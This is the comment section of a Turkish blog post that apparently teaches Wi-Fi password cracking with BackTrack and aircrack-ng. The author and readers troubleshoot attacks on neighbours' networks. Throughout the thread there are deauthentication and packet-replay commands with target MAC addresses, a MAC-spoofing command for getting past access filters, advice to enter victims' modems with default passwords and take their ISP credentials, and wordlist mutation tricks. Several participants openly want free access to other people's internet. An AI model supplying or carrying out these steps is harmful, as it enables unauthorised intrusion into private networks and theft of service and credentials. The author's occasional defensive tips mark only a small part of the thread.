    Sevgili VATANDAŞ kardeşimin içini biraz olsun rahatlatalım… Şimdi abicim şifresini kırmayı başardığımız ağın sahibinin modemine giriyoruz öncelikle. Ki çoğunluk default modem şifrelerini kullandığı için bu kolay bir işlem oluyor. Her marka modemin sonuçta standart bir şifresi var. Arayan bulur. Neyse modeme girdikten sonrada TTnet mi olur Smile ADSL mi olur artık ne abonesi ise kullanıcı ve şifrelerini alıp, gidip bakıyoruz kotalımı kullanıyor, kotasız mı. Buna göre vicdanımızın sesini kestikten sonra fazla abanmadan ufak ufak sesimizi çıkarmadan kullanıyoruz. Ha ama kotalı ise kesinlikle burdaki hiç bir arkadaşım kullanmıyordur ben buna kefil olabilirim… Burdan da ne öğrenmiş olduk kesinlikle modemlerimizin şifrelerini harfler,rakamlar ve çeşitli karakterlerle değiştirmemiz gerektiğini…

    Sevgi ile kalın dostlar…

  143. #227 burak tarafından, tarihinde

    Murat bey merhaba ;
    backtrack 5 de kismet çalışmıyor yada ben beceremedim 🙂 SSID si ni bulmam gereken bi Ağ var şifresiz ve benim bulundugum yerden cok güzel çekiyor 🙂 Nasıl bulabilecegimiz konusunda yardım edebilirsenis sevinirim

    • #228 Murat Çeşmecioğlu tarafından, tarihinde

      Kismet’i bugün denedim ama isim bulamadım.

      Öncelikle üstteki menüden start server ‘ı seçiyorsunuz. Kendi kurduğu server’a bağlanıyor.
      Gelen uyarıların birinde “tanımlanmış bağdaştırıcı yok” diyor. Eklemenizi istiyor.
      Intf yazan yere wlan0 yazdım. Altındaki bölüme isim verdim (Örn: Wire). En alttaki parametre bölümünü boş bıraktım. Ağları buldu. Fakat isimsizler gözükmedi. Başka yapılacak birşey varsa henüz bilmiyorum 🙂

  144. #229 liana tarafından, tarihinde

    Murat Bey kendinizi geliştirme şeklinize bir diyeceğimiz yok ama bunu herkesle paylaşmanızıda hiç gerek yok.Sizin sayenizde suan kimbilir kaç kişinin cebinden haksız olarak para gidecek.belki siz haksız yere bu şifreleri kullnmıyor olabilirsiniz ama herkes siz gibi değil.Öğrenemediğiniz birşey var.çoğu insanımızın tabir-i caizse nerede beleş oraya yerleş mantıklı insanlar olduğunu öğrenememişsiniz.

    • #230 Murat Çeşmecioğlu tarafından, tarihinde

      Merhaba liana (Yorumda isminizi böyle yazdığınız için bende böyle hitap ediyorum).

      Öncelikle yorumunuz için teşekkür ederim. Kişisel olarak “bilgi paylaştıkça çoğalır” düşüncesini desteklediğim için öğrendiklerimi burda paylaşıyorum. Daha önce de buna benzer yorumlar geldiğinde söylediğim birşeyi tekrar söyleyeceğim: Bardağın dolu tarafına bakmıyorsunuz.

      Elbette burdaki bilgilerle başkalarının şifrelerini bularak interneti kullanan insanlar var. Dediğinize katılıyorum ve öğrenememiş değilim çünkü etrafımdaki çoğu kişi ve insanlarımızın büyük çoğunluğu dediğiniz gibi nerde-beleş-oraya-yerleş mantıklı insanlar 🙂 Ayrıca burdaki bilgileri okuyan, uygulayan ve kullanan insanların neyin doğru neyin yanlış olduğunu ayırt edebilecek kapasitede olduğunu düşünüyorum. Yani isterlerse bunları kullanmayıp, sizin tabirinizle, haksızlık yapmayabilirler. Buna ne ben ne siz karışabiliriz. Bu tamamen uygulayanların kendi tercihleridir.

      Bardağın dolu tarafına gelirsek… Burda yazanları okursanız size bu şekilde saldıranlardan nasıl korunacağınızı öğrenebilirsiniz. Hatta tüm şifre kırma yazılarının ortak sonucunu söyleyeyim: “Eğer WPA2 şifrelemesi ve 15-16 alfanumerik karakterli bir şifre kullanırsanız, bunu çözmeleri imkansıza yakındır.”.

      Sonuç olarak elinizdeki bilgiyi nasıl kullanacağınız sizin elinizde. İsterseniz kendinizi korumak için isterseniz saldırmak için kullanabilirsiniz. Ama lütfen bilginin paylaşılmasına, çoğalmasına ve insanların nasıl kullanması gerektiğine karışmayın.

      Teşekkür ederim.

  145. #231 Levent Özçelik tarafından, tarihinde

    Selam benim 5 tane sorum olacak yardımcı olursanız cok mutlu olurum
    1) Tum bunları yaparken ınternet baglantısına ıhtıyacım varmı ? yoksa ınternet baglantım olmadan da wıreless ıle kanal dınleyıp ıslemlerı yapabılırmıyım ?
    2) aırmın-ng start wlan0 dedıgım de pıd-name gıbı yazılar cıkıyor ve en altta
    wlan0 rtl8187 r8187s1c…….. : operation not permitted diyor bunun dınleme ozellıgı yok mu demek
    3) airodump-ng -c 11 mon0 dedigimde o komutun ardından alt satırda
    interface mon0:ioctl(SIOCGIFINDEX) failed: no such device diyor
    4)application dan internet oradan da WICH Network Manager i sectigim de bi bolum acılıyor ve scaning yazısını bkliyorum ardından ise no wireless network found diyor bu ne anlama geliyor benım bu işleri ytapmam icin nelere ihtiyacım var bilmiyorum yardımcı olursunuz umarım
    ve 5) masa ustunde install backtrack diye bir uygulama var 7-8 adımdan olusuyor ve ilk adımlarda turkıye filan seciyorum klavye gibilerinden ufak bilgiler
    ama 4. adıma gectigim de karsıma partion larım geliyor HDD nın kurulum yerını secmemı ıstıyor sanırım neyse orayıda ne secersem secıyım atlayamadım bıcımlendırmeyı secmedım cunku hdd gıtsın ıstemedım bos bır bolum gereklı sanırım onun ıcın neyse onu kurmalımıyım ?

  146. #232 ali tarafından, tarihinde

    kardes tamam mac veriyor anlamdıgım bir şey var benim wpa2 şifrelemde sadece modem içinde belirtilen macler girebiliyor bunu için modem içine girip kendi mac adrsimizi eklememiz lazım web şifresi bir anlam taşımıyor wpa lar nasıl kırılacak bu çok zor gibi modem içine mac adreslerini ekliyor sadece bu maclar girebiliyor modem içine ulaşırsak bunu degiştirebiliriz :))))

    • #233 Murat Çeşmecioğlu tarafından, tarihinde

      airodump-ng ile modeme bağlı kullanıcılardan birinin MAC adresini kopyalayın.
      Sonra dinleme işlemlerini ve kartı kapatın.
      ifconfig eth0 hw ether 00:01:02:03:04:08 komutunu kullanıp MAC adresinizi değiştirin 🙂
      Sonra bağlanın.

  147. #234 enes tarafından, tarihinde

    s.a hocam benim bilgisayarda boardcam kart var onun dışında wireless adaptör kullanıyorum bunun sayesinde kırabilirmiiyim WPA yı ?????

    • #235 Murat Çeşmecioğlu tarafından, tarihinde

      Eğer handshake yakalıyorsanız ve kullandığınız wordlist’in içinde wireless şifresi varsa tabiki kırabilirsiniz.

  148. #236 Şaban Dirlik tarafından, tarihinde

    Hocam benim şöyle bir sorunum var elimde bir harici hdd var bunun üzerine BackTrack 5 kurmaya çalıştım ve başarılı olamadım 🙁 gel gelelim sinirlendim tüm elimdeki BackTrack 5 bilgilerini sildi pc yi eski haline getirdim bir baktim ki HDD windows ortamında görmüyor tekrar BackTrack 5 kurmadan bu hariciyi windows ortamında biçimlendirip eski haline döndürebilirmiyim ?? acil ceaplarınızı bekliyorum şimdiden teşekkürler..

    • #237 Şaban Dirlik tarafından, tarihinde

      Hocam cevabını buldum cokta kolaymış tekrar teşekkürler :)))

  149. #238 batıkan tarafından, tarihinde

    kolay gelsin . ben son kısma kadar herşeyi yaptım hatta başka bir wep şifresi kırdım ama wpa kırmak istiyorum . paket topluyorum ama handshake yakalıyamıyorum . atack yapsamda olmuyo . birde wordlist olmadan olmadığını son yazılarda gördüm . o kadar uğraşmıştım . worldlist nerden bulabilirim yardım edebilirmisin ? ve worldliste o şifre olmadan hiç bi şekilde paket toplıyarak wepteki gibi kıramazmıyız ? şimdiden teşekkürler

    • #239 Murat Çeşmecioğlu tarafından, tarihinde

      Paket toplayarak WPA kıramazsınız. Bir çok sitede wordlist paylaşımları yapılıyor. Onlardan birini kullanabilirsiniz.
      Handshake yakalıyorsunuzdur belki ama airodump-ng ekranında gözükmüyor olabilir. aircrack-ng ile kırmayı denediğinizde yakalayıp yakalamadığınızı görebilirsiniz.

  150. #240 fatih tarafından, tarihinde

    abicim herşey iyi güzel teşekkür ederiz de bunun indirmesi nerde onu bulamadım yardımcı olursan murat abicim çok makbule geçer

  151. #242 mertcan tarafından, tarihinde

    Arkadaşlar ben bu BT5 İ KURDUM türkçe olarak ama çalıştırdığımda ingilizce tekrara türkçeye nasıl çevircem bunu bide ekran ayarı yapıyorum acaıp kapayınca eski haline dönüyo bunları nasıl halledebilirim.

  152. #243 ali26 tarafından, tarihinde

    meraba murat abi ben dediklerini aynen yaptım fakat daha masaüstüne gelmeden ( error 15 file not found ) hatası veriyor ne yapmam lazm yardımcı olurmussun lütfen

  153. #244 ergün tarafından, tarihinde

    slm hocam bi sorum olacaktı.. bt4 ü vmware üzerine kurdum start deyip masaüstüne geldim ama normalde win7 olan pc de ve vmware üzerinde vista da nete girebiliyordum ama vmware bt4 ile giremedim acaba şu driver sorunumu.. laptopda denedim.. ve konsolu açıp airmon -ng yazdım ağı bulamadı..nedeni ne olabilir..tşkrler..

  154. #246 ergün tarafından, tarihinde

    hocam bi kaçsorum olacaktı.. şimdi bu bt ye linux tabanlı diyorlar ben bt4 cd sini taktım ve vmware üzerinde kurarken linuxu değilde orteri seçtim.. diğer olması lazım.. kurulum tamamlandı masaüstüne geldim konsolu açtım airmon-ng yazdım herhabgi bi ağ bulmadı nedeni linuxu seçmemiş olmam olabilirmi..
    iki gnome kde farkedermi..
    3 laptop ta bu iş olurmu usb wifi sinyal alıcı işe yaramazmı.. 4 benim wifi kartımın ne olduunu ve hangi driverlara ihtiyacım oldfuunu nerden anlarım.. şimdiden teşekkürler..

  155. #247 Buğra tarafından, tarihinde

    WPA ‘da Data paketi toplasak kırma ihtimali varmı?ben geçen gün bir ağı izlemeye aldım ağdaki kullanıcı sayesinde 30000 e yakın data topladım.aircrack programı fail dedi,acaba 70000 felan data toplasak kırarmı ?

    • #248 Ozan Arslan tarafından, tarihinde

      Selam Buğra,

      Noralde aircrack için en az 5000 gerekiyor. 30 000 toplamışsın ki gayet yeterli. Sorun data sayısında değil, izlemeye alırken bir şey atlamış olabilirsin belki.

  156. #249 Semih tarafından, tarihinde

    Merhabalar.. Murat hocam sizi gercekten tebrik ediyorum harika bir insansiniz.. yazilarinizin cogunu okudum ve hic biryerde takilmadim saniyordum.. Hersey tamam masa backtrak masa ustum aciliyor ve masa ustunde Install BackTrak diye icon var onu kurmak zorundamiyim? Kurmak zorunda isem 420 gb olan D diskimden, disk bolumleme asamasinda 320 ye dusurdum fakat acilan 100 gb yi kullanamiyorum.. Onu yuklemesem sorun olur mu? 2.si yeni tasindigim evimde alt katimda oturan bir kac genc modemime girip kendi mac adresimi enngelliyor. her yolu denedim onlarin gozunu korkutmak istiyorum hack konusunda. benimde wpa2/psk onlarinda wpa2 hack konusunda sizden bilgi istiyorum bilgisayarim haftalarca acik kalabilir sorun degil.. Yardimci olursaniz yok sevinirim.. Calismalarinizi takip edecegim allah kolaylik versin.. Allah razi olsun.,

    • #250 Murat Çeşmecioğlu tarafından, tarihinde

      Hayır, Backtrack’i yüklemek zorunda değilsiniz. Cd-rom’dan ya da sanal makinadan çalıştırıyorsanız istediğiniz gibi kullanabilirsiniz.
      Modeminizde sayı, karakter ve !’^+%& gibi karakterlerden oluşan 15 karakterli bir şifre yaparsanız modeminize girip ayarlarınızı değiştiremezler.Eğer yinede değiştirebiliyorlarsa site olarak toplanıp gidip öğrenelim nasıl kırdıklarını 🙂
      Etrafınızdaki insanların gözünü korkutmak ya da sinir etmek için yöntemleri anlattığım bir yazı hazırlıyorum 🙂 Onları kullanabilirsiniz. Güzel yöntemler var 🙂

  157. #251 Ozan Arslan tarafından, tarihinde

    Merhabalar Murat Bey öncelikle ellerinize sağlık.

    Yöntemi uygulamayı bütün kodları biliyorum fakat ben kendi toparladığım laptopum mevcut şu anda ve backtrack uygulamasını bu laptopta kullanmam gerekiyo.

    Özetle airmon-ng komutunda interface ya da herhangi bir bilgi alamıyorum. Bunun sebebi ise programın board’da takılı olan WLAN cardı mı görmüyor olması. Bunun üzerine bir arkadaşımdan Airties model USB WLAN adapter aldım. Fakat yine program görmedi. WMware kullanıyorum ordan external device tan da etkinleştirdim.

    Daha sonra BT nin kendi sitesinde uyumlu olan wireless adapter ları buldum fakat bunların çoğu türkiye de yok olanlar ise 150 lira en az. bir günlük bir uğraş için vermek istemiyorum bu parayı. Nasıl çözebilirim bu sorunu bi fikriniz var mıdır ?

    Şimdiden çok teşekkürler.

  158. #252 o.uyar.2012@hotmail.com tarafından, tarihinde

    arkadaşlar biri bana sağlam daha çok türkçe karakter olan wordlist önersinn şimdiden teşekkürlerrr…

  159. #253 ergün tarafından, tarihinde

    slm hocam ben bt5 i kurdum ama usb yi tanıtamadım..bide elimde bi kaç tane ağın hash değerleri var bunlar elc wirls secrty ile kırılıyor ama ben kırayım dedim saniyede 3-5 şifre tek deniyor en az 10 yıl sürer kırması..bu hashleri bt5 ile kıramazmıyım.. bide şu elc wirls secrty nin ekrn kartımı kullanıp kullanamadığını nasıl test ederim.. ve eğer müsait olursanız msn den bi soru soracam eğer olursa en zor şifre kırma işleri bile sadece dakikalarla mümkün olacak.. ipucu: paketteki şifreleri değilde şifre karakterleri tek bulunsa… :))

    • #254 ergün tarafından, tarihinde

      hacom şifre kırma ekranında şifrelerri denerken altta master key, transied key, aepol mhac gibi şeyler varya sanırım elimde transied key var sadece bununla şifreyi kırabilirmiyim..
      ağ adı barcelona trransied keyy ……. gibi

      • #255 Murat Çeşmecioğlu tarafından, tarihinde

        Hayır, oradaki bilgiler size şifreyi sağlamaz. Resimdeki gibi “key found” yazısını görmeniz gerekli.

        • #256 ergün tarafından, tarihinde

          cevabınız için tşkrler ama bazı sorularım yanıtsız kaldı.. elcmsft olayını çözemedim.. bide dediğim gibi şifreyi değil de şifredeki karakterleri tek analiz ettiremezmiyiz.. atıyorum elimdeki wordlist:
          a
          b
          .
          .
          z
          0
          1
          .
          .
          9
          #
          $
          .
          .
          \

          gibi olsun.. airleri çözümleyip kodları değiştirsek (veya başka bi yolla yapsak) ve normalde aircrack e sorduğumuz soru “paketteki şifre wordlistte varmı” iken soruyu şöyle sorsak olmaz mı: “paketteki şifrenin karakterleri wordlistte varmı..” ve keyfound yerinde sadece karakterler varsa atıyorum
          keyfound[02aahkt] şeklinde ise biz anlarız ki şifrede iki tane a harfi var..birer tanede 0 2 h k t harfleri var.. ve bu şekilde, şifrelerin olduğu wordlistle taratmak yerine, tahminen bu şifrenin:
          kahta02 veya 02kahta olabileceğini anlarız demi.. 🙂 evet kahtalıyım..
          paketler sanrım 1000 bayt ve 3 parçalı..başlık,gövde ve son kısım.. acaba toplanan pakertlerdeki verilerde (şifreli paketteki verilerde) şifrenin olduğu bi txt mi var yoksa şifrenin karakterlieri ayrı ayrı paketlerin içinde parçalanmış şekilde mi var.. bunlkarla birz uğraşsak bence çok daha kısa sürede sonuca ulaşabiliriz değilmi hocam.. ??

          • #257 Buğra tarafından, tarihinde

            madem bu elcomsoftun programı şifreyi biliyor,bize neden direk vermiyor ben onu merak ediyorum 😀 ben cap dosyasını not defteri ile açtım içi çok karmaşık bişey anlaşılmıyor.başka bi yöntem bulmak lazım :S

          • #258 Murat Çeşmecioğlu tarafından, tarihinde

            http://www.emo.org.tr/ekler/7600d163fa81512_ek.pdf

            Şu makaleyi okursanız yararlı olacaktır. WPA şifreleme şuna benzer: Siz ilk önce şifrenin olduğu paket ile oturum açarsınız (handshake), daha sonra tüm bilgier bu oturumdan şifreli olarak iletilir. İletilen bilgilerde şifreli olduğu için bunları dinleyemezsiniz. Ayrıca farklı saldırılara karşı koruma yöntemleri de var (makale de yazıyor.) Bu yüzden kullanıcıları ağdan düşürüp tekrar bağlanmalarını sağlamak istiyoruz ki handshake’leri yakalayalım.

            Yanlış giriş isteği yaptığınızda size gelen cevapta şifreye dair hiç bir bilgi bulunmaz 🙂
            Paketlerin incelenmesini aircrack’in sitesinde bulabilirsiniz: http://www.aircrack-ng.org/doku.php?id=wpa_capture

  160. #259 Buğra tarafından, tarihinde

    bir türlü handshake almayı başaramadım,deauth yolluyorum kullanıcı düşüyor fakat handshake alamıyorum :S aircracklada kontrol ettim 0 handshake.kesin bi yöntem varmı acaba.

    • #260 Murat Çeşmecioğlu tarafından, tarihinde

      4-5 defa arka arkaya deauth yollayıp denemek gerekiyor. Başka bildiğim kesin yolu yok 🙁
      aircrackle de kontrol edeceksiniz ki zaten yapıyormuşsunuz.

  161. #261 YILKI tarafından, tarihinde

    root@bt:~# aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:1A:2A:83:CD:AD -h d8:5d:4c:94:27:d1 mon0
    Read 8165 packets…

    Size: 373, FromDS: 1, ToDS: 0 (WEP)

    BSSID = 00:1A:2A:83:CD:AD
    Dest. MAC = 01:00:5E:7F:FF:FA
    Source MAC = 00:1A:2A:83:CD:AF

    0x0000: 0842 0000 0100 5e7f fffa 001a 2a83 cdad .B….^….*…
    0x0010: 001a 2a83 cdaf 2041 cab8 9c00 7411 5b80 ..*… A….t.[.
    0x0020: df88 6a08 a514 2fab ba87 4917 a555 8f30 ..j…/…I..U.0
    0x0030: b5c9 a5da 0df8 1390 6805 a205 14bd 429d ……..h…..B.
    0x0040: 3525 8ed6 74cc 2bef baea c01a b425 cc23 5%..t.+……%.#
    0x0050: 53ac be83 5272 d947 aab1 fb49 389d ddc4 S…Rr.G…I8…
    0x0060: 1269 9093 ba3f 3f09 c1aa 31a5 bfa0 ff7b .i…??…1….{
    0x0070: 5f65 0024 828c 91ca 8805 393f f40e e51e _e.$……9?….
    0x0080: 17fa 0653 fa85 10b5 130b f97c 6530 70db …S…….|e0p.
    0x0090: ef11 29ef 9d26 3f6b 7931 9b09 b582 92b1 ..)..&?ky1……
    0x00a0: c69e 9d33 c3d6 a0b0 a308 4d9a 7c69 1288 …3……M.|i..
    0x00b0: 59ce 738c 3819 485b f0ec cdca 9a2b 867c Y.s.8.H[…..+.|
    0x00c0: b399 1d6b 0b0b 3e32 012f 7daf ff08 8ebb …k..>2./}…..
    0x00d0: ac88 6e73 b079 b053 4708 3809 871a dea6 ..ns.y.SG.8…..
    — CUT —

    Use this packet ? y

    Saving chosen packet in replay_src-0111-020510.cap
    You should also start airodump-ng to capture replies.

    sent 106352 packets…(499 pps)

    DURUM HEP BU İKEN

  162. #262 YILKI tarafından, tarihinde

    SONUÇ BU HEP NEDEN KIRMIYOR

    root@bt:~# aircrack-ng -a 1 nihat-01.cap
    Opening nihat-01.cap
    Read 22 packets.

    # BSSID ESSID Encryption

    1 00:1A:2A:83:CD:AD nihat WEP (10 IVs)

    Choosing first network as target.

    Opening nihat-01.cap
    Attack will be restarted every 5000 captured ivs.
    Starting PTW attack with 10 ivs.
    Floating point exception

    • #263 Buğra tarafından, tarihinde

      siz ağda trafik yarattınızmı ilk önce ? çünki 10 data toplamışssınız 😀 çok yetersiz.

      • #264 YILKI tarafından, tarihinde

        tabiki trafik yaptım. bir alt yorumda ki sonuca göre bakarsanız
        root@bt:~# aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:1A:2A:83:CD:AD -h d8:5d:4c:94:27:d1 mon0
        Read 8165 packets…
        paket 8165 diyor ve devamında y diyorum
        sent ise
        sent 106352 packets…(499 pps
        bu şifreyi kırmadı oysa başka wep içok rahat şekilde 3 -4 kez kırdım. acaba modem uzakta olması etkilermi.:(

    • #265 Murat Çeşmecioğlu tarafından, tarihinde

      10 tane data paketi ile kırmayı deniyorsunuz. Bu sayı kırmak için yetersiz.
      Belki de seçilen paket yanlıştır. Ctrl+C ile komutu durdurup tekrar deneyin.
      Belki de modemle ilgili birşey vardır. Bu durumda ağda birilerinin olmasını bekleyeceksiniz.

  163. #266 hasan tarafından, tarihinde

    serdar :
    murat herseyi cok gzul yazmıssın da benim sole bi problemim var
    airodump-ng wlan0 yazinca bir suru wireless buluyorum ama sag tarafta ” fixed channel mon0: -1 ” cıkıyor
    bu yazı cıktıgı zaman birturlu handshake yakalayamıyorum
    wireless kartım b4318
    ubuntu kullanıyorum bi yardımcı olurmusun 🙂

    bu sorun bende de var ve handshake yakalayamıyorum, eğer serdarın sorusunu cevapladıysanız cevabı da göremedim. yardımcı olurmusunuz acaba murat bey

    • #267 Murat Çeşmecioğlu tarafından, tarihinde

      airmon-ng stop wlan0
      ifconfig wlan0 down
      iwconfig wlan0 mode managed
      ifconfig wlan0 up
      iwconfig wlan0 channel KANAL_NO
      ifconfig wlan0 down
      iwconfig wlan0 mode monitor
      ifconfig wlan0 up

      Kartınızı monitör moduna geçirmek için airmon-ng yerine bu işlemleri kullanmayı deneyin. Başka bir kanal dinlemek için aynı işlemleri tekrar yapmanız gerekiyor.

      • #268 hasan tarafından, tarihinde

        yazdıklarınızı yazıp airodump-ng -c 1 mon0
        şeklinde devam ettim
        (kıracağımız wireless 1. kanalda. KANAL-NO yazdığınız yere 1 yazdım yani 1. kanalı dinlemeye aldım diye düşünüyorum)

        daha sonraki işlemlerde yeni konsol açarak

        aireplay-ng –deauth 1 -a D8:5D:4C:D4:A9:8D -c 00:13:E8:A2:1B:B3 mon0
        yazdığımda
        16:50:56 Waiting for beacon frame (BSSID: D8:5D:4C:D4:A9:8D) on channel -1
        16:50:57 mon0 is on channel -1, but the AP uses channel 1

        yazısı çıkıyor, mon0 -1. kanalda ama kırmamız gereken wireless 1. kanalda diyor sanırım yani biz 1. kanalı dinleme modunda açamıyoruz sorun bu, yardımlarınız için tşk..

        • #269 Murat Çeşmecioğlu tarafından, tarihinde

          Monitör modna alırken airmon-ng start wlan0 KANAL-NO şeklinde deneyebilir misiniz?

  164. #270 Buğra tarafından, tarihinde

    hocam bende usb wlan var (asus wl-167g) yetersiz geliyor, sizce bu ürünü alsam bi artış sağlarmıyım.bana cazip geldi sizinde fikrinizi almak istiyorum 🙂 teşekkürler.

    http://www.teknobiyotik.com/network/kablosuz-ag-adaptorleri/dark-150mbps-1km-menzilli-5dbi-kablosuz-antenli-usb-adaptor.html

  165. #271 karakaya tarafından, tarihinde

    murat bey herşey çook güzel anlatılmış fakat.wpa kırarken kullanacağımız wordlıst leri örneğin beini ye nasıl kopyalayacağımızı anlatmamışsınız.web kırmada yuzde 100 başarılıyım fakat wpa da bu wordlist olayı yüzünden kırmada sıkıntı çekiyorum.beiniyi iso olarak kullanıyorum. c sürücümün alanı dar o problem değil ama keyler.txt ye sizin wordlisti nasıl atabilirim………….çok acil yardım……….

  166. #272 karakaya tarafından, tarihinde

    bir de bu işlerle ilgilenen arkadaşlara tavsiyem öncelikle iso formatında beini 1.2.1 programı tp-link w722 cihaz 16 dbi omni anten bulabilirlerse web te yüzde 100 kırarlar.

    • #273 YILKI tarafından, tarihinde

      dostum daha önce denedim beini tp-lin w722 i tanımadı atheros chipsetli bu yazını okudum tekrar denedim yine aynı bu adaptör beinide işe yaramıyor ama backtrack ta süper işliyor. kimse uğraşmasın beinide tp link adaptörle

      • #274 karakaya tarafından, tarihinde

        windows xp sp3 işletim sistemim.beini 1.2.1 version olduktan sonra hertürlü tanıyor.isteyen başka adaptör kullansın ben sadece yardımcı olmak için yazdım.çekim güçleri yüksek adaptörler.bt4 te de tanımaz öyle olsa. bende bt4 de mon0 olarak cıktı beini de wlan1 fark burada.
        wordlisti beini iso da çalışırken atabiliosan onu söyle dostum faydalanalım.

      • #275 karakaya tarafından, tarihinde

        beini 1.2.2 de bi dene istersen

  167. #276 karakaya tarafından, tarihinde

    yardım murat bey acil lütfen….
    re …..murat bey herşey çook güzel anlatılmış fakat wpa kırarken kullanacağımız wordlıst leri örneğin beini ye nasıl kopyalayacağımızı anlatmamışsınız.web kırmada yuzde 100 başarılıyım fakat wpa da bu wordlist olayı yüzünden kırmada sıkıntı çekiyorum.beiniyi iso olarak kullanıyorum. c sürücümün alanı dar o problem değil ama keyler.txt ye sizin wordlisti nasıl atabilirim………….çok acil yardım……….

    • #277 karakaya tarafından, tarihinde

      bu işe gönül verdik sayenizde 😀 allah razı olsun

  168. #278 Furkan Tosun tarafından, tarihinde

    Murat hocam bu handshake paketini usbye atıp başka bi bilgisayarda deneme şansımız armı acaba ?

  169. #279 Taten tarafından, tarihinde

    Peki bu WPA kirma isini basarabilen var mi??? bi el kaldirin bakalm kimler basarms… bu zamana kdr kac kere denedm ama hic basarmadm… sadece WEPler…

    • #280 Murat Çeşmecioğlu tarafından, tarihinde

      Ben verdiğim örnekte kendim başarıp anlattım. Ayrıca kafadan atarak tutturduğum da oldu.

  170. #281 özgür tarafından, tarihinde

    .cap uzantılı dosyayı backtrackta kaydedip win7 de açabilirmiyiz?kaydettiği yeri nasıl öğrenebilirim?

    • #282 Murat Çeşmecioğlu tarafından, tarihinde

      eğer -w parametresine sadece dosya adı yazmadıysanız bulunduğunuz klasör içine kayıt ediyor

  171. #283 yuzde52 tarafından, tarihinde

    selamlar bt5 kullanıcaklar için dark rengemax high power 300 mb. ağ adaptörü bt5’i destekliyor..

    vmware workstation sanal pc ile bt5’i kullanıyorum bi kaç tane web şifresi kırdım, elimde 30 gb wpa wordlist var birde wpa’yı denemek istiyorum yalnız bu wordlistler windows /d’de kayıtlı wpa kırarken aircrack işleminde bu wordlist.txt docsyasına ihtiyacımız olucak tabiki. ancak vmware sanal pc bt5 nasıl görücek bu txtleri? yada başka bir anlatımla bu wordlistleri sanal pc’ye kopyalayabiliyormuyuz? bunun çözümü nedir acaba bilgisi olan yardımcı olurmu? teşekkürler…

    • #284 Murat Çeşmecioğlu tarafından, tarihinde

      Ağ’dan kopyalanabilir, yada USB’yi sanal makinaya takıp ordan atabilirsiniz.

  172. #285 özgür tarafından, tarihinde

    hocam ben anlattıklarınızın hepsini yaptım.kırmak istediğim ağdan hanshake yakaladım.fakat yakaladığım bu handsakeyi backtrackta kaydedip windowsta nasıl açarım?yakalamış olduğum bu hanshakeyi söylediğiniz elcomsoft programıyla şifresini kırmaya çalışacağım.

  173. #286 ergün tarafından, tarihinde

    sayın hocam ben ergün geçen de yorum yapmıştım.. demiştim ki elimde sadece ağın adı ve 64 haneli keyi var onunla kırılmaz mı yok dediniz.. evettt… sizin resimlerde ağ adı t emniyet olan ve key i 88fa.. ile başlayan bi şifreyi kırmöıştınız ve şifrenin hosgeldin olduğunu biliyoruz.. ben aldım o resimdeki 64 haneli keyi üşenmeden yazdım ağ adına da tc emniyet yazdım ve içinde hosgeldin yazan bi wordlist ile tarattım şifreyi buldum.. elcomsoft ile.. benden size tavsiye elcıomsoft ile kırın o daha kolay ve daha iyi.. en büyük özelliği de şu: elindeki şifreleri tek tek deniyor, sırasıyla tersten, büyük kçk olarak deniyor, şifrenin aralarına simgeler koyuyor, yetmedi şifreleri iki dfa yazıyor, şifrelerin sonuna yılları koyuyor kısacası şöyle bi örnek verem..
    Vaka mutasyon: Program büyük / küçük harf karakterleri tüm çeşitlerini kontrol eder.

    Rakam mutasyon: (Sözlük) önek ve sonek olarak çalışma birkaç basamak sözlerine ekledi.

    Yukarıdakilere benzer, ancak yalnızca rakam değil, ama aynı zamanda 123 $ $ $, 666, qwerty, 007, ххх vb gibi en sık kullanılan kombinasyonlar ekleyerek; ek olarak, her iki kelimenin sonunda bazı karakter ekleyerek: Sınır mutasyon örn. # Şifre #, $ parola $ ve daha fazla.

    Freak mutasyon: (bir veya daha fazla) bazı karakterler yerine, örneğin, kelime şifresi p @ ssword, p @ $ kelime ve p @ $ $ w0rd üretecektir.

    Kısaltma mutasyon: ihateyou gibi bazı sık kullanılan kısaltmaları – ih8you, loveyou – loveu, senin için – 4u vb.

    Sipariş mutasyon: sipariş (şifre – drowssap) ters, ters kelime (şifre – passworddrowssap) ekleyerek, kelime (şifre – passwordpassword) tekrar.

    Ünlüler mutasyon: ünlüler ile oynarken, örn. psswrd, şifre, parola vb.

    Strip mutasyon: tek bir karakter çıkarmadan, örn. assword, pssword, şifresi …

    Bazı karakterler yerine, örn: mutasyon de değiştirilir apssword, psasword, şifre …

    Yinelenen karakterleri çoğaltarak, örneğin: mutasyon pParola, paassword, passsword, passwword vb.

    Sınırlayıcısı mutasyon: karakterler arasında delimters ekleyerek: şifre, p + a + s + s + w + o + r + d, şifre.

    Yıl mutasyon: password1973, password2002: kelimenin sonuna (dört basamaklı) yıl ekleyerek.

    ewet arrkadaşlar bu şekilde birçok şifre kırdım mesela bi tane ağın adı barcelona idi bende bi wordlistin içine barcelonanın bütün kadrosunu alt alta ekledim ve tarattım bana şifreyi messimessi olarak verdi halbuki wordlistte “messimessi” diye birşey yoktu sadce Messi vardı dikkat ettiyseniz Messi nin M si büyüktü ama şifrenin ki küçük..

    resim nasıl yüklenir bilmiyom ama öğrenirsem size bi de görüntüsünü yükleyeyim isterseniz bakın..

    murat hocam yanlış anlamayın lütfen aa sadece bilgilendireyim dedim.. ben de bt5 ile kırıyorum ama elcomsoft ta idare ediyor..en azından paket toplamana gerek yok.. sadece master key ve ağ ismi lazım bide wordlist :))

    sanırım resim oldu 🙂
    http://a1201.hizliresim.com/t/w/26gmt.jpg

    • #287 ergün tarafından, tarihinde

      dikkat ederseniz resimde şifrenin sağında kırma tarihi ve saati yazıyor.. şimdi bide benim yoprumumun saatine bakın.. kırdım ve hemen ardındn ekledim ama sanırım murat hocamızın sitesinin saatimi farklı neyse tam örtüşmedi ama en azından olayı anlamışsınızdır umarım.. 🙂

    • #288 Murat Çeşmecioğlu tarafından, tarihinde

      Çok güzel yazmışsınız, teşekkür ederim.

      Fakat bir noktaya değinmek istiyorum: WPA için paket toplamanıza gerek yok zaten. Handshake yakalamak yeterli. Zaten o handshake olmadan master key dediğiniz şeye ulaşamazsınız. aircrack-ng programı handshake bulunamadı diye hata verir.

      • #289 ergün tarafından, tarihinde

